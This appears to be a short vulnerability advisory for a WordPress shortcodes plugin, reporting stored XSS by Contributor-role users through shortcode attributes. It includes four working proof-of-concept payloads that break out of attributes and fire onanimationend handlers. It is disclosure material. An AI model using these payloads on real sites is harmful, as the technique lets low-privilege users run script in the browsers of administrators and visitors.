The plugin allows users with Contributor roles to perform stored XSS via shortcode attributes. Note: the plugin is inconsistent in its handling of shortcode attributes; some do escape, most don't, and there are even some attributes that are insecure by design (like [su_button]'s onclick attribute).
[su_accordion class='" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(1)'] [su_animate duration='1s;animation-name:twentytwentyone-close-button-transition;' type='" onanimationend="alert(2)'] [su_audio width='1;animation-name:twentytwentyone-close-button-transition" onanimationend="alert(3)//' url="a"] [su_box color='red;animation-name:twentytwentyone-close-button-transition" onanimationend="alert(4)//']
apple502j
apple502j
Yes
2021-08-23 (about 1 years ago)
2021-08-23 (about 1 years ago)
2022-03-07 (about 1 years ago)